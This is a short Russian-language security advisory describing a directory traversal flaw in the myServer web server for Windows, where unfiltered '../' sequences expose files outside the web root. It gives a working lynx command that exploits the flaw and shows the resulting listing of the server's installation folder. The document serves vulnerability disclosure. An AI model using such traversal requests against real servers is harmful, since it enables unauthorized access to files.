myServer – популярный Web сервер для Windows систем, написанный на С++. Планируется также перенос сервера на UNIX системы.

Сервер не фильтрует последовательность ‘../’, которая может использоваться для получения доступа к файлам вне корневой WWW директории и для DoS атаки. Пример:

bash$ lynx -dump http://myServerhost/../../myServerEXEC-0.2 > x82-x0x bash$ cat x82-x0x
Contents of folder ../../myServerEXEC-0.2/
File Last modify Size
cgi-lib 0/11/102-12:4:16 System time
control.exe 3/11/102-10:48:28 System time 258048 bytes
CVS 0/11/102-12:4:18 System time
languages 0/11/102-12:4:18 System time
libhoard.dll 3/9/102-6:0:0 System time 32843 bytes
logs 0/11/102-12:4:18 System time
MIMEtypes.txt 0/11/102-3:50:42 System time 276 bytes
myserver.exe 3/11/102-10:49:2 System time 200704 bytes
myserver.xml 0/11/102-1:11:46 System time 2238 bytes
readme.txt 0/11/102-9:59:6 System time 1836 bytes
REGISTER SERVICE.bat 3/9/102-6:0:0 System time 20 bytes
START CONSOLE.bat 3/9/102-6:0:0 System time 20 bytes
START SERVICE.bat 3/9/102-6:0:0 System time 17 bytes
STOP SERVICE.bat 3/9/102-6:0:0 System time 16 bytes
system 0/11/102-12:4:18 System time
UNREGISTER SERVICE.bat 3/9/102-6:0:0 System time 22 bytes
web 0/11/102-12:4:18 System time



Оставить мнение